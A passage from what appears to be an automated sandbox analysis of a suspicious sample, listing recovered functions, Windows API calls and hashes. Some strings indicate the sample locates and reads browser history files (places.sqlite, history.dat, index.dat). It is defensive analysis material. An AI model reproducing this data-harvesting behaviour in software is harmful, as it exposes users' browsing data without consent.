                                                                                                          • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                        • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                          • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                          • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                          • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75922EE0), ref: 0040E3EC
                                                                                                        • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                        • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                          • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                          • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                          • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 1979745280-0
                                                                                                        • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                        • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                        • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                        • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                        Function 00414C2E Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                        • memset.MSVCRT ref: 00414C87
                                                                                                        • wcscpy.MSVCRT ref: 00414CFC
                                                                                                          • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                        Strings
                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressProcVersionmemsetwcscpy
                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                        • API String ID: 4182280571-2036018995
                                                                                                        • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                        • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                        • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                        • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                        Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                          • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                          • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                        • memset.MSVCRT ref: 00403A55
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                          • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                          • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                          • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                          • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                          • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                          • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                        • String ID: history.dat$places.sqlite
                                                                                                        • API String ID: 2641622041-467022611
                                                                                                        • Opcode ID: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                        • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                        • Opcode Fuzzy Hash: ff38290cf6d73649d3c52fc0ad95bc2cdf601f157f84f60878f9098853983ee3
                                                                                                        • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                        Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                          • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                        • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                        • GetLastError.KERNEL32 ref: 00417627
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$File$PointerRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 839530781-0
                                                                                                        • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                        • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                        • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                        • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                        Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileFindFirst
                                                                                                        • String ID: *.*$index.dat
                                                                                                        • API String ID: 1974802433-2863569691
                                                                                                        • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                        • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                        • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                        • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                        Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • GetLastError.KERNEL32 ref: 004175A8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$FilePointer
                                                                                                        • String ID:
                                                                                                        • API String ID: 1156039329-0
                                                                                                        • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                        • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                        • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                        • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                        Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                        • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                        • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleTime
                                                                                                        • String ID:
                                                                                                        • API String ID: 3397143404-0
                                                                                                        • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                        • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                        • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                        • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                        Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                        • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                        • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                        • String ID:
                                                                                                        • API String ID: 1125800050-0
                                                                                                        • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                        • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                        • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                        • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                        Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                        • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandleSleep
                                                                                                        • String ID: }A
                                                                                                        • API String ID: 252777609-2138825249
                                                                                                        • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                        • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                        • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                        • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                        Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • malloc.MSVCRT ref: 00409A10
                                                                                                        • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                        • free.MSVCRT ref: 00409A31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: freemallocmemcpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3056473165-0
                                                                                                        • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                        • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                        • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                        • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                        Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: d
                                                                                                        • API String ID: 0-2564639436
                                                                                                        • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                        • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                        • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                        • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                        Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: BINARY
                                                                                                        • API String ID: 2221118986-907554435
                                                                                                        • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                        • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                        • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                        • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                        Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcsicmp
                                                                                                        • String ID: /stext
                                                                                                        • API String ID: 2081463915-3817206916
                                                                                                        • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                        • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                        • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                        • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                        Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                          • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                          • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                          • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                        • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                          • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                        • String ID:
                                                                                                        • API String ID: 2445788494-0
                                                                                                        • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                        • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                        • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                        • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                        Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                          • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                          • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                          • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                          • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                        • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 3150196962-0
                                                                                                        • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                        • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                        • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                        • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                        Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: malloc
                                                                                                        • String ID: failed to allocate %u bytes of memory
                                                                                                        • API String ID: 2803490479-1168259600
                                                                                                        • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                        • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                        • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                        • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                        Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.MSVCRT ref: 0041BDDF
                                                                                                        • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcmpmemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1065087418-0
                                                                                                        • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                        • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                        • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                        • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                        Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                          • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                        • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                        • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                          • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                          • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                          • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                          • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1381354015-0
                                                                                                        • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                        • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                        • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                        • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                        Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: free
                                                                                                        • String ID:
                                                                                                        • API String ID: 1294909896-0
                                                                                                        • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                        • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                        • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                        • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                        Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                          • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                          • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                          • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                        • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000E.00000002.2576899980.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                                                                        Similarity
